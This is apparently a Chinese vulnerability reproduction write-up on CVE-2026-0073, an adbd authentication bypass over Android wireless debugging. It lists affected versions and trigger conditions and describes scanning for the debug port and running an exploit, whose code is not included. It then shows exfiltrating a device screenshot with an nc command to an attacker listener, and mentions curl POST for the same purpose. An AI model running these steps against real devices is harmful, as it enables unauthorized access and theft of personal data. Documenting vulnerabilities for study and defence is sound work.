1. 前言
CVE-2026-0073是安卓的系统组件 adbd 的身份验证漏洞,攻击者构造特定的TLS握手包,可以绕过adbd的身份验证机制,直接RCE。
受影响的安卓版本如下(未安装2026年五月的安全补丁):
- android:14.0
- android:15.0
- android:16.0
- android:16.0:qpr2_beta_1
- android:16.0:qpr2_beta_2
- android:16.0:qpr2_beta_3
触发条件:
- 开启了无线调试并且无线调试的端口可被访问
- 曾经授权过USB调试或者无线调试(表现为
/data/misc/adb/adb_keys文件中存在至少一个密钥)
漏洞数据库:https://nvd.nist.gov/vuln/detail/CVE-2026-0073
2. 漏洞复现
2.1. 正常调试流程
正常的调试连接流程如下:
- 目标主机开启了无线调试

目标主机使用配对码配对设备
电脑使用adb工具包对目标和主机进行连接和配对:
adb pair 172.20.10.4:随机端口adb devices查看连接状态

adb -s 设备名称 shell进入shell

2.2. 漏洞利用流程
使用EXP进行漏洞利用则只需要符合触发条件即可绕过授权码直接拿到adb shell。
通过端口扫描工具扫描目标主机的无线调试端口,确认端口开放后直接运行EXP即可:
1 | rustscan -r 1-65535 -a 172.20.10.2 |


获得 shell 用户权限后,虽然不是 root,但足以访问大量敏感数据。
下面演示一下获取设备当前屏幕截图以及回传文件到攻击机。
在shell中使用screencap -p /sdcard/sc.png命令将截图保存到手机存储中,然后在攻击机上用ncat -lv 9999 > sc.png开启监听,最后再在shell中使用cat /sdcard/sc.png | nc 172.20.10.3 9999将截图传输到攻击机上:


注意:无法使用adb pull命令直接将文件传输到攻击机上,因为该命令的前提是已经通过配对码成功配对了设备,而EXP绕过了配对码的验证,所以无法使用adb pull命令进行文件传输。只能通过其他方式(如上面演示的使用nc命令,或者curl命令发post)将文件传输到攻击机上。
推荐阅读ADB用法大全获取更多ADB shell的使用方法:https://mazhuang.org/awesome-adb/


















